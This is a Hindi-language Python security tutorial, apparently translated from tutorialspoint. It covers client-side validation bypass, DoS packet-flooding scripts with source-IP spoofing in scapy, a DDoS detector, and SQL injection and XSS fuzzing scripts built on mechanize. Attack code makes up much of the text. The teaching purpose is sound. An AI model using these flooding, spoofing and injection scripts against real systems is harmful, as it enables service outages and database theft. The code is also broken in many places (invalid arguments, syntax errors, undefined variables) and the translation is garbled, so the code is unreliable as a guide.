इस अध्याय में, हम यह जानेंगे कि पायथन पेंटिग में सत्यापन कैसे मदद करता है।

सत्यापन का मुख्य लक्ष्य परीक्षण करना और यह सुनिश्चित करना है कि उपयोगकर्ता ने एक ऑपरेशन को सफलतापूर्वक पूरा करने के लिए आवश्यक और ठीक से स्वरूपित जानकारी प्रदान की है।

सत्यापन के दो अलग-अलग प्रकार हैं -

  • क्लाइंट-साइड सत्यापन (वेब ​​ब्राउज़र)
  • सर्वर-साइड सत्यापन

सर्वर-साइड वैलिडेशन और क्लाइंट-साइड वैलिडेशन

पोस्ट बैक सत्र के दौरान सर्वर साइड पर होने वाले उपयोगकर्ता इनपुट सत्यापन को कहा जाता है server-side validation। PHP और ASP.Net जैसी भाषाएं सर्वर-साइड सत्यापन का उपयोग करती हैं। एक बार सर्वर साइड पर सत्यापन की प्रक्रिया समाप्त हो जाने के बाद, एक नया और गतिशील वेब पेज बनाकर फीडबैक क्लाइंट को वापस भेजा जाता है। सर्वर-साइड सत्यापन की मदद से, हम दुर्भावनापूर्ण उपयोगकर्ताओं के खिलाफ सुरक्षा प्राप्त कर सकते हैं।

दूसरी ओर, ग्राहक पक्ष पर होने वाले उपयोगकर्ता इनपुट सत्यापन को क्लाइंट-साइड सत्यापन कहा जाता है। जावास्क्रिप्ट और VBScript जैसी स्क्रिप्टिंग भाषाओं का उपयोग किया जाता हैclient-side validation। इस तरह के सत्यापन में, सभी उपयोगकर्ता इनपुट सत्यापन उपयोगकर्ता के ब्राउज़र में ही किए जाते हैं। यह सर्वर-साइड सत्यापन की तरह सुरक्षित नहीं है क्योंकि हैकर आसानी से हमारी क्लाइंट साइड स्क्रिप्टिंग भाषा को दरकिनार कर सकता है और सर्वर को खतरनाक इनपुट सबमिट कर सकता है।

टेम्परिंग क्लाइंट-साइड पैरामीटर: सत्यापन बायपास

HTTP प्रोटोकॉल में पासिंग को POST और GET के तरीकों की मदद से किया जा सकता है। GET का उपयोग किसी निर्दिष्ट संसाधन से डेटा का अनुरोध करने के लिए किया जाता है और POST का उपयोग किसी सर्वर को डेटा भेजने या संसाधन को अपडेट करने के लिए किया जाता है। इन दोनों विधियों में एक बड़ा अंतर यह है कि यदि कोई वेबसाइट GET पद्धति का उपयोग कर रही है तो URL में पासिंग पैरामीटर दिखाए जाते हैं और हम इस पैरामीटर को बदल सकते हैं और इसे वेब सर्वर को पास कर सकते हैं। उदाहरण के लिए, क्वेरी स्ट्रिंग (नाम / मान जोड़े) एक GET अनुरोध के URL में भेजा गया है:/test/hello_form.php?name1 = value1&name2 = value2। दूसरी ओर, POST विधि का उपयोग करते समय पैरामीटर नहीं दिखाए जाते हैं। POST के साथ सर्वर पर भेजा गया डेटा HTTP अनुरोध के अनुरोध निकाय में संग्रहीत है। उदाहरण के लिए, POST/test/hello_form.php HTTP/1.1 Host: ‘URL’ name1 = value1&name2 = value2

सत्यापन बाईपास के लिए पायथन मॉड्यूल

पायथन मॉड्यूल जिसका हम उपयोग करने जा रहे हैं mechanize। यह एक पायथन वेब ब्राउज़र है, जो एक वेब पेज में वेब फॉर्म प्राप्त करने की सुविधा प्रदान करता है और इनपुट मानों को जमा करने की सुविधा प्रदान करता है। मशीनीकरण की मदद से, हम सत्यापन और टेम्पर्ड क्लाइंट-साइड मापदंडों को बायपास कर सकते हैं। हालाँकि, इसे हमारे पाइथन लिपि में आयात करने से पहले, हमें निम्नलिखित कमांड निष्पादित करके इसे स्थापित करने की आवश्यकता है -

pip install mechanize

उदाहरण

निम्नलिखित एक पायथन स्क्रिप्ट है, जो पैरामीटर पारित करने के लिए POST विधि का उपयोग करके वेब फॉर्म की मान्यता को बायपास करने के लिए मैकेनाइज का उपयोग करता है। वेब फॉर्म लिंक से लिया जा सकता हैhttps://www.tutorialspoint.com/php/php_validation_example.htm और अपनी पसंद के किसी भी डमी वेबसाइट में इस्तेमाल किया जा सकता है।

शुरुआत करने के लिए, आइए हम मशीनी ब्राउज़र आयात करें -

import mechanize

अब, हम नाम की एक वस्तु बनाएंगे brwsr मशीनी ब्राउज़र का -

brwsr = mechanize.Browser()

कोड की अगली पंक्ति से पता चलता है कि उपयोगकर्ता एजेंट रोबोट नहीं है।

brwsr.set_handle_robots( False )

अब, हमें अपनी डमी वेबसाइट का url प्रदान करना होगा जिसमें वेब फॉर्म होगा जिस पर हमें सत्यापन को बायपास करना होगा।

url = input("Enter URL ")

अब, निम्नलिखित पंक्तियाँ कुछ पैरेंट को सही पर सेट करेंगी।

brwsr.set_handle_equiv(True)
brwsr.set_handle_gzip(True)
brwsr.set_handle_redirect(True)
brwsr.set_handle_referer(True)

इसके बाद वेब पेज खुलेगा और उस पेज पर वेब फॉर्म प्रिंट होगा।

brwsr.open(url)
for form in brwsr.forms():
   print form

कोड की अगली पंक्ति दिए गए फ़ील्ड पर मान्यताओं को दरकिनार कर देगी।

brwsr.select_form(nr = 0)
brwsr.form['name'] = ''
brwsr.form['gender'] = ''
brwsr.submit()

स्क्रिप्ट के अंतिम भाग को वेब फॉर्म के क्षेत्रों के अनुसार बदला जा सकता है, जिस पर हम सत्यापन को बायपास करना चाहते हैं। यहाँ उपरोक्त लिपि में, हमने दो क्षेत्र लिए हैं -‘name’ तथा ‘gender’ जिसे खाली नहीं छोड़ा जा सकता (आप वेब फ़ॉर्म की कोडिंग में देख सकते हैं) लेकिन यह स्क्रिप्ट उस सत्यापन को बायपास कर देगी।

इस अध्याय में, हम DoS और DdoS हमले के बारे में जानेंगे और समझेंगे कि उनका कैसे पता लगाया जाए।

ई-कॉमर्स उद्योग में उछाल के साथ, वेब सर्वर अब हमलों का खतरा है और हैकर्स के लिए एक आसान लक्ष्य है। हैकर्स आमतौर पर दो तरह के हमले का प्रयास करते हैं -

  • DoS (इनकार-की-सेवा)
  • DDoS (सेवा से वंचित)

DoS (इनकार-की-सेवा) हमला

डेनियल ऑफ़ सर्विस (DoS) का हमला हैकर्स द्वारा नेटवर्क संसाधन को अनुपलब्ध बनाने का एक प्रयास है। यह आमतौर पर मेजबान को अस्थायी या अनिश्चित काल तक बाधित करता है, जो इंटरनेट से जुड़ा होता है। ये हमले आम तौर पर मिशन महत्वपूर्ण वेब सर्वर जैसे कि बैंक, क्रेडिट कार्ड भुगतान गेटवे पर होस्ट की गई सेवाओं को लक्षित करते हैं।

DoS हमले के लक्षण

  • असामान्य रूप से धीमा नेटवर्क प्रदर्शन।

  • किसी विशेष वेब साइट की अनुपलब्धता।

  • किसी भी वेब साइट तक पहुँचने में असमर्थता।

  • प्राप्त स्पैम ईमेलों की संख्या में नाटकीय वृद्धि।

  • वेब या किसी भी इंटरनेट सेवाओं तक पहुंच का दीर्घकालिक खंडन।

  • किसी विशेष वेबसाइट की अनुपलब्धता।

DoS अटैक और इसके पायथन कार्यान्वयन के प्रकार

DoS attack को डाटा लिंक, नेटवर्क या एप्लिकेशन लेयर पर लागू किया जा सकता है। आइए अब हम विभिन्न प्रकार के DoS हमलों के बारे में जानें &; पायथन में उनका कार्यान्वयन -

सिंगल आईपी सिंगल पोर्ट

सिंगल आईपी और सिंगल पोर्ट नंबर का उपयोग करके बड़ी संख्या में पैकेट वेब सर्वर को भेजे जाते हैं। यह एक निम्न-स्तरीय हमला है जिसका उपयोग वेब सर्वर के व्यवहार को जांचने के लिए किया जाता है। पायथन में इसका कार्यान्वयन स्कैपी की मदद से किया जा सकता है। निम्नलिखित अजगर स्क्रिप्ट सिंगल आईपी सिंगल पोर्ट DoS हमले को लागू करने में मदद करेगी -

from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)
   
   print ("packet sent ", i)
      i = i + 1

निष्पादन के बाद, उपरोक्त स्क्रिप्ट निम्नलिखित तीन चीजों के लिए पूछेगा -

  • स्रोत और लक्ष्य का आईपी पता।

  • स्रोत पोर्ट नंबर का आईपी पता।

  • फिर यह अपने व्यवहार की जांच के लिए सर्वर को बड़ी संख्या में पैकेट भेजेगा।

सिंगल आईपी मल्टीपल पोर्ट

एकल IP का उपयोग करके और कई पोर्ट से बड़ी संख्या में पैकेट वेब सर्वर को भेजे जाते हैं। पायथन में इसका कार्यान्वयन स्कैपी की मदद से किया जा सकता है। निम्नलिखित अजगर स्क्रिप्ट सिंगल आईपी मल्टीपल पोर्ट DoS हमले को लागू करने में मदद करेगी -

from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
i = 1

while True:
   for source_port in range(1, 65535)
      IP1 = IP(source_IP = source_IP, destination = target_IP)
      TCP1 = TCP(srcport = source_port, dstport = 80)
      pkt = IP1 / TCP1
      send(pkt, inter = .001)
      
      print ("packet sent ", i)
         i = i + 1

मल्टीपल आईपी सिंगल पोर्ट

एक से अधिक IP और सिंगल पोर्ट नंबर से वेब सर्वर पर बड़ी संख्या में पैकेट भेजे जाते हैं। पायथन में इसका कार्यान्वयन स्कैपी की मदद से किया जा सकता है। निम्नलिखित पायथन लिपि सिंगल आईपी मल्टीपल पोर्ट DoS अटैक को लागू करती है -

from scapy.all import *
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   a = str(random.randint(1,254))
   b = str(random.randint(1,254))
   c = str(random.randint(1,254))
   d = str(random.randint(1,254))
   dot = “.”
   
   Source_ip = a + dot + b + dot + c + dot + d
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt,inter = .001)
   print ("packet sent ", i)
      i = i + 1

मल्टीपल आईपी मल्टीपल पोर्ट

बड़ी संख्या में पैकेट कई IP और कई पोर्ट का उपयोग करके वेब सर्वर पर भेजे जाते हैं। पायथन में इसका कार्यान्वयन स्कैपी की मदद से किया जा सकता है। निम्नलिखित पायथन लिपि कई IP को कई पोर्ट DoS हमले को लागू करने में मदद करती है -

Import random
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
i = 1

while True:
   a = str(random.randint(1,254))
   b = str(random.randint(1,254))
   c = str(random.randint(1,254))
   d = str(random.randint(1,254))
   dot = “.”
   Source_ip = a + dot + b + dot + c + dot + d
   
   for source_port in range(1, 65535)
      IP1 = IP(source_IP = source_IP, destination = target_IP)
      TCP1 = TCP(srcport = source_port, dstport = 80)
      pkt = IP1 / TCP1
      send(pkt,inter = .001)
      
      print ("packet sent ", i)
         i = i + 1

DDoS (वितरित इनकार-की-सेवा) हमला

डिस्ट्रीब्यूटेड डिनायल ऑफ सर्विस (DDoS) हमला एक ऑनलाइन सेवा या एक वेबसाइट बनाने का एक प्रयास है जो इसे कई स्रोतों से उत्पन्न यातायात की भारी बाढ़ के साथ अधिभारित करके अनुपलब्ध है।

डेनियल ऑफ़ सर्विस (DoS) हमले के विपरीत, जिसमें एक कंप्यूटर और एक इंटरनेट कनेक्शन का उपयोग पैकेट के साथ लक्षित संसाधन को बाढ़ने के लिए किया जाता है, एक DDoS हमले में कई कंप्यूटर और कई इंटरनेट कनेक्शन का उपयोग किया जाता है, जिसे अक्सर विश्व स्तर पर वितरित किया जाता है जिसे बॉटनेट कहा जाता है। । एक बड़े पैमाने पर वॉल्यूमेट्रिक DDoS हमला प्रति सेकंड दसियों गीगाबिट्स (और यहां तक ​​कि सैकड़ों गीगाबिट्स) में मापा गया यातायात उत्पन्न कर सकता है। इसे विस्तार से पढ़ा जा सकता हैhttps://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm।

अजगर का उपयोग कर DDoS का पता लगाना

दरअसल DDoS अटैक का पता लगाना थोड़ा मुश्किल होता है क्योंकि आपको पता नहीं होता है कि जो ट्रैफिक भेज रहा है वो नकली है या असली। नीचे दी गई पायथन लिपि DDoS हमले का पता लगाने में मदद करेगी।

शुरू करने के लिए, हमें आवश्यक पुस्तकालयों का आयात करना चाहिए -

import socket
import struct

from datetime import datetime

अब, हम एक सॉकेट बनाएंगे जैसा कि हमने पिछले अनुभागों में भी बनाया है।

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)

हम एक खाली शब्दकोश का उपयोग करेंगे -

dict = {}

कोड की निम्न पंक्ति एक पाठ फ़ाइल खोलेगी, जिसमें उपाधि मोड में DDoS हमले का विवरण होगा।

file_txt = open("attack_DDoS.txt",'a')
t1 = str(datetime.now())

निम्नलिखित लाइन ऑफ कोड की मदद से, जब भी प्रोग्राम चलता है, तब वर्तमान समय लिखा जाएगा।

file_txt.writelines(t1)
file_txt.writelines("\n")

अब, हमें एक विशेष आईपी से हिट को मानने की आवश्यकता है। यहां हम यह मान रहे हैं कि यदि कोई विशेष आईपी 15 से अधिक बार मार रहा है तो यह एक हमला होगा।

No_of_IPs = 15
R_No_of_IPs = No_of_IPs +10
   while True:
      pkt = s.recvfrom(2048)
      ipheader = pkt[0][14:34]
      ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
      IP = socket.inet_ntoa(ip_hdr[3])
      print "The Source of the IP is:", IP

कोड की निम्न पंक्ति यह जांच करेगी कि आईपी शब्दकोष में मौजूद है या नहीं। यदि यह मौजूद है तो यह इसे 1 से बढ़ा देगा।

if dict.has_key(IP):
   dict[IP] = dict[IP]+1
   print dict[IP]

अतिरेक को दूर करने के लिए कोड की अगली पंक्ति का उपयोग किया जाता है।

if(dict[IP] > No_of_IPs) and (dict[IP] < R_No_of_IPs) :
   line = "DDOS attack is Detected: "
   file_txt.writelines(line)
   file_txt.writelines(IP)
   file_txt.writelines("\n")
else:
   dict[IP] = 1

उपरोक्त स्क्रिप्ट को चलाने के बाद, हमें परिणाम एक पाठ फ़ाइल में मिलेगा। स्क्रिप्ट के अनुसार, यदि कोई आईपी 15 से अधिक बार हिट करता है तो इसे प्रिंट किया जाएगा क्योंकि उस आईपी पते के साथ DDoS हमले का पता लगाया जाता है।

SQL इंजेक्शन SQL कमांड का एक सेट है जो URL स्ट्रिंग या डेटा स्ट्रक्चर्स में रखा जाता है ताकि हम उन डेटाबेस से प्रतिक्रिया प्राप्त कर सकें जो हम वेब एप्लिकेशन से जुड़े हैं। इस प्रकार का हमला आमतौर पर PHP या ASP.NET का उपयोग करके विकसित वेबपृष्ठों पर होता है।

एक SQL इंजेक्शन हमला निम्नलिखित इरादों के साथ किया जा सकता है -

  • डेटाबेस की सामग्री को संशोधित करने के लिए

  • डेटाबेस की सामग्री को संशोधित करने के लिए

  • विभिन्न प्रश्नों को करने के लिए जिन्हें आवेदन द्वारा अनुमति नहीं है

इस प्रकार का हमला तब काम करता है जब अनुप्रयोग SQL कथन को पास करने से पहले इनपुट को ठीक से मान्य नहीं करते हैं। इंजेक्शन को आमतौर पर एड्रेस बार, खोज फ़ील्ड या डेटा फ़ील्ड में रखा जाता है।

यह पता लगाने का सबसे आसान तरीका है कि यदि कोई वेब एप्लिकेशन SQL इंजेक्शन के हमले के लिए असुरक्षित है, तो स्ट्रिंग में "'" वर्ण का उपयोग करके देखें कि क्या आपको कोई त्रुटि मिलती है।

SQLi अटैक के प्रकार

इस खंड में, हम विभिन्न प्रकार के SQLi हमले के बारे में जानेंगे। हमले को निम्नलिखित दो प्रकारों में वर्गीकृत किया जा सकता है -

  • इन-बैंड SQL इंजेक्शन (सरल SQLi)

  • इंफ्रारेड एसक्यूएल इंजेक्शन (ब्लाइंड एससीआई)

इन-बैंड SQL इंजेक्शन (सरल SQLi)

यह सबसे आम एसक्यूएल इंजेक्शन है। इस तरह का एसक्यूएल इंजेक्शन मुख्य रूप से तब होता है जब एक हमलावर एक ही संचार चैनल का उपयोग करने के लिए दोनों हमलों और अलग-अलग परिणामों को लॉन्च करने में सक्षम होता है। इन-बैंड SQL इंजेक्शन को आगे दो प्रकारों में विभाजित किया जाता है -

  • Error-based SQL injection - एक त्रुटि-आधारित SQL इंजेक्शन तकनीक डेटाबेस की संरचना के बारे में जानकारी प्राप्त करने के लिए डेटाबेस सर्वर द्वारा फेंके गए त्रुटि संदेश पर निर्भर करती है।

  • Union-based SQL injection - यह एक अन्य इन-बैंड SQL इंजेक्शन तकनीक है जो दो या दो से अधिक SELECT स्टेटमेंट के परिणामों को एक ही परिणाम में संयोजित करने के लिए UNION SQL ऑपरेटर का लाभ उठाता है, जिसे बाद में HTTP प्रतिसाद के भाग के रूप में लौटाया जाता है।

इंफ्रारेड एसक्यूएल इंजेक्शन (ब्लाइंड एससीआई)

इस तरह के एसक्यूएल इंजेक्शन हमले में, हमलावर इन-बैंड के परिणाम को देखने में सक्षम नहीं होता है क्योंकि वेब एप्लिकेशन के माध्यम से कोई डेटा स्थानांतरित नहीं होता है। यही कारण है कि इसे ब्लाइंड SQLi भी कहा जाता है। इंफ़रेंशियल SQL इंजेक्शन दो प्रकार के होते हैं -

  • Boolean-based blind SQLi - इस तरह की तकनीक डेटाबेस में एक एसक्यूएल क्वेरी भेजने पर निर्भर करती है, जो एप्लिकेशन को एक अलग परिणाम वापस करने के लिए मजबूर करती है, इस आधार पर कि क्वेरी एक TRUE या FALSE परिणाम देती है।

  • Time-based blind SQLi- इस तरह की तकनीक डेटाबेस में एक SQL क्वेरी भेजने पर निर्भर करती है, जो प्रतिक्रिया देने से पहले डेटाबेस को निर्दिष्ट समय (सेकंड में) की प्रतीक्षा करने के लिए मजबूर करती है। प्रतिक्रिया समय हमलावर को इंगित करेगा कि क्या क्वेरी का परिणाम TRUE या FALSE है।

उदाहरण

आवेदन में इनपुट डेटा में हेरफेर करके सभी प्रकार की एसक्यूआई को लागू किया जा सकता है। निम्नलिखित उदाहरणों में, हम अनुप्रयोग पर हमला करने वाले वैक्टर को इंजेक्ट करने और हमले की संभावना को सत्यापित करने के लिए आउटपुट का विश्लेषण करने के लिए पायथन स्क्रिप्ट लिख रहे हैं। यहां, हम नाम के अजगर मॉड्यूल का उपयोग करने जा रहे हैंmechanize, जो एक वेब पेज में वेब फॉर्म प्राप्त करने की सुविधा देता है और इनपुट मानों को भी जमा करने की सुविधा प्रदान करता है। हमने क्लाइंट-साइड सत्यापन के लिए भी इस मॉड्यूल का उपयोग किया है।

निम्नलिखित पायथन लिपि रूपों को प्रस्तुत करने और प्रतिक्रिया का उपयोग करके विश्लेषण करने में मदद करती है mechanize -

सबसे पहले हमें आयात करने की आवश्यकता है mechanize मापांक।

import mechanize

अब, फ़ॉर्म सबमिट करने के बाद प्रतिक्रिया प्राप्त करने के लिए URL का नाम प्रदान करें।

url = input("Enter the full url")

कोड की निम्न पंक्ति url खोलेगी।

request = mechanize.Browser()
request.open(url)

अब, हमें फ़ॉर्म का चयन करने की आवश्यकता है।

request.select_form(nr = 0)

यहां, हम कॉलम नाम 'id' सेट करेंगे।

request["id"] = "1 OR 1 = 1"

अब, हमें फॉर्म जमा करना होगा।

response = request.submit()
content = response.read()
print content

उपरोक्त स्क्रिप्ट POST अनुरोध के लिए प्रतिक्रिया प्रिंट करेगी। हमने एसक्यूएल क्वेरी को तोड़ने और एक पंक्ति के बजाय तालिका में सभी डेटा प्रिंट करने के लिए एक हमला वेक्टर प्रस्तुत किया है। सभी हमले वैक्टर एक पाठ फ़ाइल में सहेजे जाएंगे vectors.txt कहते हैं। अब, नीचे दी गई पायथन लिपि उन अटैक वैक्टर को फाइल से प्राप्त करेगी और उन्हें एक-एक करके सर्वर पर भेज देगी। यह आउटपुट को एक फाइल में भी सेव करेगा।

शुरू करने के लिए, आइए हम मैकेनाइज मॉड्यूल को आयात करें।

import mechanize

अब, फ़ॉर्म सबमिट करने के बाद प्रतिक्रिया प्राप्त करने के लिए URL का नाम प्रदान करें।

url = input("Enter the full url")
   attack_no = 1

हमें फ़ाइल से आक्रमण वैक्टर को पढ़ने की आवश्यकता है।

With open (‘vectors.txt’) as v:

अब हम प्रत्येक क्रैक वेक्टर के साथ अनुरोध भेजेंगे

For line in v:
   browser.open(url)
   browser.select_form(nr = 0)
   browser[“id”] = line
   res = browser.submit()
content = res.read()

अब, कोड की निम्नलिखित पंक्ति आउटपुट फाइल पर प्रतिक्रिया लिख ​​देगी।

output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’)
output.write(content)
output.close()
print attack_no
attack_no += 1

प्रतिक्रियाओं की जाँच और विश्लेषण करके, हम संभावित हमलों की पहचान कर सकते हैं। उदाहरण के लिए, यदि यह प्रतिक्रिया प्रदान करता है जिसमें वाक्य शामिल हैYou have an error in your SQL syntax तो इसका मतलब है कि प्रपत्र SQL इंजेक्शन से प्रभावित हो सकता है।

क्रॉस-साइट स्क्रिप्टिंग हमले एक प्रकार के इंजेक्शन हैं जो क्लाइंट-साइड कोड इंजेक्शन हमले का भी उल्लेख करते हैं। यहां, दुर्भावनापूर्ण कोड को एक वैध वेबसाइट में इंजेक्ट किया जाता है। समान उत्पत्ति नीति (एसओपी) की अवधारणा क्रॉस-साइट स्क्रिप्टिंग की अवधारणा को समझने में बहुत उपयोगी है। हर वेब ब्राउज़र में SOP सबसे महत्वपूर्ण सुरक्षा प्रिंसिपल है। यह वेबसाइटों को दूसरे मूल वाले पृष्ठों से सामग्री प्राप्त करने से मना करता है। उदाहरण के लिए, वेब पेज www.tutorialspoint.com/index.html सामग्री को एक्सेस कर सकता हैwww.tutorialspoint.com/contact.htmlलेकिन www.virus.com/index.html सामग्री तक नहीं पहुंच सकता हैwww.tutorialspoint.com/contact.html। इस तरह, हम कह सकते हैं कि क्रॉस-साइट स्क्रिप्टिंग एसओपी सुरक्षा नीति को दरकिनार करने का एक तरीका है।

XSS अटैक के प्रकार

इस भाग में, हमें विभिन्न प्रकार के XSS हमले के बारे में जानकारी दें। हमले को निम्नलिखित प्रमुख श्रेणियों में वर्गीकृत किया जा सकता है -

  • लगातार या संग्रहीत XSS
  • गैर-लगातार या परिलक्षित XSS

लगातार या संग्रहीत XSS

इस तरह के एक्सएसएस हमले में, एक हमलावर एक स्क्रिप्ट को इंजेक्ट करता है, जिसे पेलोड के रूप में संदर्भित किया जाता है, जो स्थायी रूप से लक्ष्य वेब एप्लिकेशन पर संग्रहीत होता है, उदाहरण के लिए डेटाबेस के भीतर। यही कारण है, इसे लगातार XSS हमला कहा जाता है। यह वास्तव में XSS हमले का सबसे हानिकारक प्रकार है। उदाहरण के लिए, एक दुर्भावनापूर्ण कोड एक हमलावर द्वारा एक ब्लॉग या फोरम पोस्ट में टिप्पणी क्षेत्र में डाला जाता है।

गैर-लगातार या परिलक्षित XSS

यह XSS अटैक का सबसे आम प्रकार है जिसमें हमलावर के पेलोड को अनुरोध का हिस्सा बनना होता है, जो वेब सर्वर को भेजा जाता है और परिलक्षित होता है, इस तरह वापस आता है कि HTTP प्रतिक्रिया में HTTP अनुरोध से पेलोड शामिल होता है। यह एक गैर-लगातार हमला है क्योंकि हमलावर को प्रत्येक पीड़ित को पेलोड देने की आवश्यकता होती है। इस तरह के XSS हमलों का सबसे आम उदाहरण फ़िशिंग ईमेल हैं जिनकी मदद से हमलावर पीड़ित को उस सर्वर से अनुरोध करने के लिए आकर्षित करता है जिसमें XSS पेलोड और अंत-अप स्क्रिप्ट को निष्पादित करता है जो ब्राउज़र के अंदर परिलक्षित होता है और निष्पादित होता है। ।

उदाहरण

SQLi के रूप में ही, XSS वेब हमलों को अनुप्रयोग में इनपुट डेटा में हेरफेर करके लागू किया जा सकता है। निम्नलिखित उदाहरणों में, हम XSS वेब हमले का परीक्षण करने के लिए SQLI अटैक वैक्टर को संशोधित कर रहे हैं, जो पिछले अनुभाग में किया गया था। नीचे दी गई पायथन लिपि XSS हमले का उपयोग करके विश्लेषण करने में मदद करती हैmechanize -

के साथ शुरू करने के लिए, हम आयात करते हैं mechanize मापांक।

import mechanize

अब, फ़ॉर्म सबमिट करने के बाद प्रतिक्रिया प्राप्त करने के लिए URL का नाम प्रदान करें।

url = input("Enter the full url")
   attack_no = 1

हमें फ़ाइल से आक्रमण वैक्टर को पढ़ने की आवश्यकता है।

With open (‘vectors_XSS.txt’) as x:

अब हम प्रत्येक क्रैक वेक्टर के साथ अनुरोध भेजेंगे -

For line in x:
   browser.open(url)
browser.select_form(nr = 0)
   browser[“id”] = line
   res = browser.submit()
content = res.read()

कोड की निम्नलिखित पंक्ति मुद्रित हमले के वेक्टर की जांच करेगी।

if content.find(line) > 0:
print(“Possible XSS”)

कोड की निम्न पंक्ति आउटपुट फ़ाइल की प्रतिक्रिया लिख ​​देगी।

output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’)
output.write(content)
output.close()
print attack_no
attack_no += 1

XSS तब होता है जब उपयोगकर्ता इनपुट बिना किसी सत्यापन के प्रतिक्रिया के लिए प्रिंट करता है। इसलिए, XSS हमले की संभावना की जांच करने के लिए, हम हमारे द्वारा प्रदान किए गए हमले के वेक्टर के लिए प्रतिक्रिया पाठ की जांच कर सकते हैं। यदि हमले के वेक्टर किसी भी भागने या सत्यापन के बिना प्रतिक्रिया में मौजूद है, तो XSS हमले की उच्च संभावना है।